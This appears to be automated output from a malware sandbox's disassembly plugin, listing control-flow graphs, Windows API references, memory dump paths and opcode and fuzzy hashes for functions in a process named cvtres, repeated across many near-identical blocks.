                                                                          control_flow_graph 382 9ecc1b1-9ecc1ce 742 9ecc1ce call b5ba21 382->742 743 9ecc1ce call b5b9c0 382->743 744 9ecc1ce call b5b73f 382->744 386 9ecc1d4-9ecc215 745 9ecc215 call b5c047 386->745 746 9ecc215 call b5cc57 386->746 747 9ecc215 call b5c806 386->747 748 9ecc215 call b5c058 386->748 749 9ecc215 call b5c758 386->749 750 9ecc215 call b5cbf8 386->750 751 9ecc215 call b5bfc8 386->751 389 9ecc21b-9ecc25c 752 9ecc25c call b5ccc7 389->752 753 9ecc25c call b5cd18 389->753 392 9ecc262-9ecc2a3 754 9ecc2a3 call b5d9f9 392->754 755 9ecc2a3 call b5dbe8 392->755 395 9ecc2a9-9ecc331 KiUserExceptionDispatcher 756 9ecc331 call b5e4e1 395->756 757 9ecc331 call b5e900 395->757 758 9ecc331 call b5e4e8 395->758 400 9ecc337-9ecc378 759 9ecc378 call b5e9b0 400->759 760 9ecc378 call b5e95f 400->760 403 9ecc37e-9ecc413 761 9ecc413 call b5f791 403->761 762 9ecc413 call b5f840 403->762 763 9ecc413 call b5f89f 403->763 410 9ecc419-9ecc4a1 739 9ecc4a1 call b5f901 410->739 740 9ecc4a1 call b5f960 410->740 741 9ecc4a1 call b5f9bf 410->741 416 9ecc4a7-9eccbe1 DisplayExitWindowsWarnings KiUserExceptionDispatcher LdrInitializeThunk 502 9eccf05-9ecd37b KiUserExceptionDispatcher 416->502 503 9eccbe7-9eccc0b 416->503 612 9ecd671-9ecd682 502->612 613 9ecd381-9ecd3a4 502->613 508 9eccd64-9eccd88 503->508 509 9eccc11 503->509 517 9eccd8e-9eccd90 508->517 518 9eccd8a 508->518 509->508 511 9eccc17-9eccd5f 509->511 511->502 523 9eccd97-9eccdc1 517->523 521 9eccd8c 518->521 522 9eccd92 518->522 521->517 522->523 532 9eccdc7-9eccdc9 523->532 533 9eccdc3 523->533 534 9eccdd0-9eccdd6 532->534 536 9eccdcb 533->536 537 9eccdc5 533->537 534->502 538 9eccddc-9ecceda 534->538 536->534 537->532 538->502 616 9ecd688-9ecd68f 612->616 617 9ecd9e2-9ecd9e9 612->617 623 9ecd659-9ecd66e 613->623 624 9ecd3aa-9ecd41c 613->624 619 9ecd728-9ecd72f 616->619 620 9ecd695-9ecd6f5 616->620 621 9ecd9ef-9ecda60 617->621 622 9ecda6b-9ecda86 617->622 625 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 619->625 626 9ecd8a1-9ecd8a8 619->626 620->617 621->622 635 9ecd66f 623->635 654 9ecd641-9ecd653 624->654 655 9ecd422-9ecd429 624->655 625->617 626->617 630 9ecd8ae-9ecd9b7 call 9ecb2e0 call 9ecaee8 call 9ecaf30 626->630 720 9ecd9c3 630->720 635->635 654->623 654->624 658 9ecd42f-9ecd53d 655->658 659 9ecd542-9ecd56d 655->659 658->654 659->654 663 9ecd573-9ecd616 659->663 663->654 720->617 739->416 740->416 741->416 742->386 743->386 744->386 745->389 746->389 747->389 748->389 749->389 750->389 751->389 752->392 753->392 754->395 755->395 756->400 757->400 758->400 759->403 760->403 761->410 762->410 763->410
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: cb1e8c9d48a545a5d9b29417ca0c657cfe89017e56666defb6127d8cac9049e5
                                                                          • Instruction ID: 96067760df64d4a13d66062449df325a029797e4a0c56b1ec7606e8d5b79ad54
                                                                          • Opcode Fuzzy Hash: cb1e8c9d48a545a5d9b29417ca0c657cfe89017e56666defb6127d8cac9049e5
                                                                          • Instruction Fuzzy Hash: A162F6B4A04268CFCB659F30D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: a99b133c6018e5c59eb4bbbbbff7311287e982d129446f604a35372b017d2d85
                                                                          • Instruction ID: df7545d1aa14fa7ad49e9159b99dccd3bb4bc4727504842ec60a732f064185da
                                                                          • Opcode Fuzzy Hash: a99b133c6018e5c59eb4bbbbbff7311287e982d129446f604a35372b017d2d85
                                                                          • Instruction Fuzzy Hash: B062F6B4A04268CFCB659F30D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: a37c13519b677b4b9dc3e352667a672f68192450e216756f5564b18f66479bc1
                                                                          • Instruction ID: 55b44a5f042b97a7b1b9dfbe7a8cdc9e83c0aebac206c4bd57986b5af139826e
                                                                          • Opcode Fuzzy Hash: a37c13519b677b4b9dc3e352667a672f68192450e216756f5564b18f66479bc1
                                                                          • Instruction Fuzzy Hash: 8052E5B4A04268CFCB659F30D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 1d6c48ba36f5bf64079b940c7f0d02a675111eb94037277a50ff2d30b4ad3725
                                                                          • Instruction ID: d7a6e84c6b0a9195fa7165cef0af4f796a18ee29ed0dc388b5e37699ae281a7a
                                                                          • Opcode Fuzzy Hash: 1d6c48ba36f5bf64079b940c7f0d02a675111eb94037277a50ff2d30b4ad3725
                                                                          • Instruction Fuzzy Hash: 7952E5B4A04268CFCB659F30D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECC2EA
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: de685baa17d238773583b4ca1d5b555249453ead7e1e76552ce75a4f4723e925
                                                                          • Instruction ID: d4a4f823c3dcf33a357babdd2e9da146fb85ca4aea472d24422ff0db74b3b946
                                                                          • Opcode Fuzzy Hash: de685baa17d238773583b4ca1d5b555249453ead7e1e76552ce75a4f4723e925
                                                                          • Instruction Fuzzy Hash: C552E5B4A04268CFCB649F30D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 527f3f24b5819e37ba191063d63af0e482546a6aaa5f52b36ca5559e93926407
                                                                          • Instruction ID: 092bbba19246c7e529360c6fb562582fc7e3413a04dce902074524a492e5e643
                                                                          • Opcode Fuzzy Hash: 527f3f24b5819e37ba191063d63af0e482546a6aaa5f52b36ca5559e93926407
                                                                          • Instruction Fuzzy Hash: 7D52E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: f65fd609c2ab27d276fb210f0584fe20d53d5b1d28f64937d46bc0c9c3f4cf4e
                                                                          • Instruction ID: 079c6d2b76474775e550c25aafb8a5dae420ec1159385ff62013032e377a6e27
                                                                          • Opcode Fuzzy Hash: f65fd609c2ab27d276fb210f0584fe20d53d5b1d28f64937d46bc0c9c3f4cf4e
                                                                          • Instruction Fuzzy Hash: 1852E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: fc81e9a1b5bbe6e2ebfa4704c402767ae9269f5ac1223202f708a3bb6ef5376e
                                                                          • Instruction ID: e9019c137de18617f1432c04f5178a3f97b7cbba1f36b43c9e94aa34ab23e7cc
                                                                          • Opcode Fuzzy Hash: fc81e9a1b5bbe6e2ebfa4704c402767ae9269f5ac1223202f708a3bb6ef5376e
                                                                          • Instruction Fuzzy Hash: F852D5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: d0cd030525790e69ef222a84abb0a219cd1dc25148306309e551ba0c75a5cf69
                                                                          • Instruction ID: 0d6578fd174ed1c874354f080c2a05582c7496a34c8fa0f3c1adc4ccceb6d582
                                                                          • Opcode Fuzzy Hash: d0cd030525790e69ef222a84abb0a219cd1dc25148306309e551ba0c75a5cf69
                                                                          • Instruction Fuzzy Hash: CC52D5B4A04268CFCB649B70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 3606 9ecc434-9ecc44c 3608 9ecc455-9ecc45a 3606->3608 3610 9ecc460-9ecc472 3608->3610 3611 9ecc479-9ecc4a1 3610->3611 3936 9ecc4a1 call b5f901 3611->3936 3937 9ecc4a1 call b5f960 3611->3937 3938 9ecc4a1 call b5f9bf 3611->3938 3613 9ecc4a7-9ecc500 3617 9ecc507-9ecc526 3613->3617 3619 9ecc52c-9ecc53e 3617->3619 3620 9ecc545-9ecc56d 3619->3620 3622 9ecc573-9ecc5c3 3620->3622 3626 9ecc5ca-9ecc5e9 3622->3626 3628 9ecc5ef-9ecc601 3626->3628 3629 9ecc608-9ecc627 3628->3629 3631 9ecc62d-9ecc63f 3629->3631 3632 9ecc646-9ecc66e 3631->3632 3634 9ecc674-9ecc686 3632->3634 3635 9ecc68d-9ecc6b5 3634->3635 3637 9ecc6bb-9ecc6cd 3635->3637 3638 9ecc6d4-9ecc6fc 3637->3638 3640 9ecc702-9ecc714 3638->3640 3641 9ecc71b-9ecc743 3640->3641 3643 9ecc749-9ecc75b 3641->3643 3644 9ecc762-9ecc78a 3643->3644 3646 9ecc790-9ecc7a2 3644->3646 3647 9ecc7a9-9ecc7d1 3646->3647 3649 9ecc7d7-9ecc7e9 3647->3649 3650 9ecc7f0-9ecc818 3649->3650 3652 9ecc81e-9ecc830 3650->3652 3653 9ecc837-9ecc85f 3652->3653 3655 9ecc865-9ecc877 3653->3655 3656 9ecc87e-9ecc8a6 3655->3656 3658 9ecc8ac-9ecc8be 3656->3658 3659 9ecc8c5-9ecc8ed 3658->3659 3661 9ecc8f3-9ecc905 3659->3661 3662 9ecc90c-9ecc934 3661->3662 3664 9ecc93a-9ecc94c 3662->3664 3665 9ecc953-9ecc97e 3664->3665 3667 9ecc984-9ecc996 3665->3667 3668 9ecc99d-9ecca06 DisplayExitWindowsWarnings 3667->3668 3672 9ecca0c-9ecca76 3668->3672 3678 9ecca81-9ecca93 KiUserExceptionDispatcher 3672->3678 3679 9ecca9b-9eccaaa 3678->3679 3681 9eccab5 3679->3681 3682 9eccabd-9eccad8 3681->3682 3685 9eccae3 3682->3685 3686 9eccaeb-9eccb06 3685->3686 3689 9eccb11 3686->3689 3690 9eccb19-9eccb34 3689->3690 3693 9eccb3f 3690->3693 3694 9eccb47-9eccb62 3693->3694 3697 9eccb6d-9eccbe1 LdrInitializeThunk 3694->3697 3699 9eccf05 3697->3699 3700 9eccbe7-9eccc0b 3697->3700 3701 9eccf0b-9eccf1d 3699->3701 3705 9eccd64-9eccd88 3700->3705 3706 9eccc11 3700->3706 3703 9eccf24-9eccf4f 3701->3703 3710 9eccf55-9eccf67 3703->3710 3714 9eccd8e-9eccd90 3705->3714 3715 9eccd8a 3705->3715 3706->3705 3708 9eccc17-9eccd58 3706->3708 3796 9eccd5f 3708->3796 3713 9eccf6e-9eccf99 3710->3713 3721 9eccf9f-9eccfb1 3713->3721 3720 9eccd97-9eccdc1 3714->3720 3718 9eccd8c 3715->3718 3719 9eccd92 3715->3719 3718->3714 3719->3720 3729 9eccdc7-9eccdc9 3720->3729 3730 9eccdc3 3720->3730 3724 9eccfb8-9eccfe3 3721->3724 3732 9eccfe9-9eccffb 3724->3732 3731 9eccdd0-9eccdd6 3729->3731 3733 9eccdcb 3730->3733 3734 9eccdc5 3730->3734 3731->3699 3735 9eccddc-9eccecf 3731->3735 3737 9ecd002-9ecd02d 3732->3737 3733->3731 3734->3729 3793 9ecceda 3735->3793 3743 9ecd033-9ecd045 3737->3743 3746 9ecd04c-9ecd089 KiUserExceptionDispatcher 3743->3746 3750 9ecd093-9ecd0a5 3746->3750 3753 9ecd0ac-9ecd0d7 3750->3753 3758 9ecd0dd-9ecd0ef 3753->3758 3761 9ecd0f6-9ecd121 3758->3761 3766 9ecd127-9ecd139 3761->3766 3769 9ecd140-9ecd16b 3766->3769 3775 9ecd171-9ecd183 3769->3775 3776 9ecd18a-9ecd1b5 3775->3776 3782 9ecd1bb-9ecd1cd 3776->3782 3785 9ecd1d4-9ecd1ff 3782->3785 3790 9ecd205-9ecd217 3785->3790 3794 9ecd21e-9ecd249 3790->3794 3793->3699 3797 9ecd24f-9ecd261 3794->3797 3796->3699 3798 9ecd268-9ecd293 3797->3798 3800 9ecd299-9ecd2ab 3798->3800 3801 9ecd2b2-9ecd2dd 3800->3801 3803 9ecd2e3-9ecd2f5 3801->3803 3804 9ecd2fc-9ecd327 3803->3804 3806 9ecd32d-9ecd37b 3804->3806 3809 9ecd671-9ecd682 3806->3809 3810 9ecd381-9ecd3a4 3806->3810 3813 9ecd688-9ecd68f 3809->3813 3814 9ecd9e2-9ecd9e9 3809->3814 3820 9ecd659-9ecd66e 3810->3820 3821 9ecd3aa-9ecd41c 3810->3821 3816 9ecd728-9ecd72f 3813->3816 3817 9ecd695-9ecd6f5 3813->3817 3818 9ecd9ef-9ecda60 3814->3818 3819 9ecda6b-9ecda86 3814->3819 3822 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 3816->3822 3823 9ecd8a1-9ecd8a8 3816->3823 3817->3814 3818->3819 3832 9ecd66f 3820->3832 3851 9ecd641-9ecd653 3821->3851 3852 9ecd422-9ecd429 3821->3852 3822->3814 3823->3814 3827 9ecd8ae 3823->3827 3833 9ecd8b3 3827->3833 3832->3832 3838 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 3833->3838 3904 9ecd9a1 3838->3904 3851->3820 3851->3821 3855 9ecd42f-9ecd53d 3852->3855 3856 9ecd542-9ecd56d 3852->3856 3855->3851 3856->3851 3860 9ecd573-9ecd616 3856->3860 3860->3851 3908 9ecd9a9 3904->3908 3913 9ecd9b0-9ecd9b7 3908->3913 3917 9ecd9c3 3913->3917 3917->3814 3936->3613 3937->3613 3938->3613
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: 0a9f5645c760afa67847e26fdcbb28f311b57f35528f15473d8309e5173a1b01
                                                                          • Instruction ID: f352f43f99d750eaf85fb0ec7068d4369c920897ae6eba17db382834721b4d65
                                                                          • Opcode Fuzzy Hash: 0a9f5645c760afa67847e26fdcbb28f311b57f35528f15473d8309e5173a1b01
                                                                          • Instruction Fuzzy Hash: DD42E5B4A04268CFCB649B70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 3939 9ecc47b-9ecc493 3941 9ecc49c-9ecc4a1 3939->3941 4266 9ecc4a1 call b5f901 3941->4266 4267 9ecc4a1 call b5f960 3941->4267 4268 9ecc4a1 call b5f9bf 3941->4268 3943 9ecc4a7-9ecc500 3947 9ecc507-9ecc526 3943->3947 3949 9ecc52c-9ecc53e 3947->3949 3950 9ecc545-9ecc56d 3949->3950 3952 9ecc573-9ecc5c3 3950->3952 3956 9ecc5ca-9ecc5e9 3952->3956 3958 9ecc5ef-9ecc601 3956->3958 3959 9ecc608-9ecc627 3958->3959 3961 9ecc62d-9ecc63f 3959->3961 3962 9ecc646-9ecc66e 3961->3962 3964 9ecc674-9ecc686 3962->3964 3965 9ecc68d-9ecc6b5 3964->3965 3967 9ecc6bb-9ecc6cd 3965->3967 3968 9ecc6d4-9ecc6fc 3967->3968 3970 9ecc702-9ecc714 3968->3970 3971 9ecc71b-9ecc743 3970->3971 3973 9ecc749-9ecc75b 3971->3973 3974 9ecc762-9ecc78a 3973->3974 3976 9ecc790-9ecc7a2 3974->3976 3977 9ecc7a9-9ecc7d1 3976->3977 3979 9ecc7d7-9ecc7e9 3977->3979 3980 9ecc7f0-9ecc818 3979->3980 3982 9ecc81e-9ecc830 3980->3982 3983 9ecc837-9ecc85f 3982->3983 3985 9ecc865-9ecc877 3983->3985 3986 9ecc87e-9ecc8a6 3985->3986 3988 9ecc8ac-9ecc8be 3986->3988 3989 9ecc8c5-9ecc8ed 3988->3989 3991 9ecc8f3-9ecc905 3989->3991 3992 9ecc90c-9ecc934 3991->3992 3994 9ecc93a-9ecc94c 3992->3994 3995 9ecc953-9ecc97e 3994->3995 3997 9ecc984-9ecc996 3995->3997 3998 9ecc99d-9ecca06 DisplayExitWindowsWarnings 3997->3998 4002 9ecca0c-9ecca76 3998->4002 4008 9ecca81-9ecca93 KiUserExceptionDispatcher 4002->4008 4009 9ecca9b-9eccaaa 4008->4009 4011 9eccab5 4009->4011 4012 9eccabd-9eccad8 4011->4012 4015 9eccae3 4012->4015 4016 9eccaeb-9eccb06 4015->4016 4019 9eccb11 4016->4019 4020 9eccb19-9eccb34 4019->4020 4023 9eccb3f 4020->4023 4024 9eccb47-9eccb62 4023->4024 4027 9eccb6d-9eccbe1 LdrInitializeThunk 4024->4027 4029 9eccf05 4027->4029 4030 9eccbe7-9eccc0b 4027->4030 4031 9eccf0b-9eccf1d 4029->4031 4035 9eccd64-9eccd88 4030->4035 4036 9eccc11 4030->4036 4033 9eccf24-9eccf4f 4031->4033 4040 9eccf55-9eccf67 4033->4040 4044 9eccd8e-9eccd90 4035->4044 4045 9eccd8a 4035->4045 4036->4035 4038 9eccc17-9eccd58 4036->4038 4126 9eccd5f 4038->4126 4043 9eccf6e-9eccf99 4040->4043 4051 9eccf9f-9eccfb1 4043->4051 4050 9eccd97-9eccdc1 4044->4050 4048 9eccd8c 4045->4048 4049 9eccd92 4045->4049 4048->4044 4049->4050 4059 9eccdc7-9eccdc9 4050->4059 4060 9eccdc3 4050->4060 4054 9eccfb8-9eccfe3 4051->4054 4062 9eccfe9-9eccffb 4054->4062 4061 9eccdd0-9eccdd6 4059->4061 4063 9eccdcb 4060->4063 4064 9eccdc5 4060->4064 4061->4029 4065 9eccddc-9eccecf 4061->4065 4067 9ecd002-9ecd02d 4062->4067 4063->4061 4064->4059 4123 9ecceda 4065->4123 4073 9ecd033-9ecd045 4067->4073 4076 9ecd04c-9ecd089 KiUserExceptionDispatcher 4073->4076 4080 9ecd093-9ecd0a5 4076->4080 4083 9ecd0ac-9ecd0d7 4080->4083 4088 9ecd0dd-9ecd0ef 4083->4088 4091 9ecd0f6-9ecd121 4088->4091 4096 9ecd127-9ecd139 4091->4096 4099 9ecd140-9ecd16b 4096->4099 4105 9ecd171-9ecd183 4099->4105 4106 9ecd18a-9ecd1b5 4105->4106 4112 9ecd1bb-9ecd1cd 4106->4112 4115 9ecd1d4-9ecd1ff 4112->4115 4120 9ecd205-9ecd217 4115->4120 4124 9ecd21e-9ecd249 4120->4124 4123->4029 4127 9ecd24f-9ecd261 4124->4127 4126->4029 4128 9ecd268-9ecd293 4127->4128 4130 9ecd299-9ecd2ab 4128->4130 4131 9ecd2b2-9ecd2dd 4130->4131 4133 9ecd2e3-9ecd2f5 4131->4133 4134 9ecd2fc-9ecd327 4133->4134 4136 9ecd32d-9ecd37b 4134->4136 4139 9ecd671-9ecd682 4136->4139 4140 9ecd381-9ecd3a4 4136->4140 4143 9ecd688-9ecd68f 4139->4143 4144 9ecd9e2-9ecd9e9 4139->4144 4150 9ecd659-9ecd66e 4140->4150 4151 9ecd3aa-9ecd41c 4140->4151 4146 9ecd728-9ecd72f 4143->4146 4147 9ecd695-9ecd6f5 4143->4147 4148 9ecd9ef-9ecda60 4144->4148 4149 9ecda6b-9ecda86 4144->4149 4152 9ecd735-9ecd87a call 9ecb2e0 call 9ecaee8 4146->4152 4153 9ecd8a1-9ecd8a8 4146->4153 4147->4144 4148->4149 4162 9ecd66f 4150->4162 4181 9ecd641-9ecd653 4151->4181 4182 9ecd422-9ecd429 4151->4182 4152->4144 4153->4144 4157 9ecd8ae 4153->4157 4163 9ecd8b3 4157->4163 4162->4162 4168 9ecd8bf-9ecd995 call 9ecb2e0 call 9ecaee8 call 9ecaf30 4163->4168 4234 9ecd9a1 4168->4234 4181->4150 4181->4151 4185 9ecd42f-9ecd53d 4182->4185 4186 9ecd542-9ecd56d 4182->4186 4185->4181 4186->4181 4190 9ecd573-9ecd616 4186->4190 4190->4181 4238 9ecd9a9 4234->4238 4243 9ecd9b0-9ecd9b7 4238->4243 4247 9ecd9c3 4243->4247 4247->4144 4266->3943 4267->3943 4268->3943
                                                                          APIs
                                                                          • DisplayExitWindowsWarnings.USER32 ref: 09ECC9BC
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECCA8D
                                                                          • LdrInitializeThunk.NTDLL ref: 09ECCB7B
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 09ECD077
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.507116356.0000000009EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9ec0000_cvtres.jbxd
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$DisplayExitInitializeThunkWarningsWindows
                                                                          • String ID:
                                                                          • API String ID: 4242710221-0
                                                                          • Opcode ID: bab41b3051a24be4df3d921aeba86f74e836021b182beb72234062cb859ee151
                                                                          • Instruction ID: 23a6dbb21cc9828db111100d0691ad159c70bdfb566f826ba3cabbbd2e3c7316
                                                                          • Opcode Fuzzy Hash: bab41b3051a24be4df3d921aeba86f74e836021b182beb72234062cb859ee151
                                                                          • Instruction Fuzzy Hash: 4042E5B4A04268CFCB649F70D99879DB7B6BB88305F1085EAD94EA3350CB359E81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
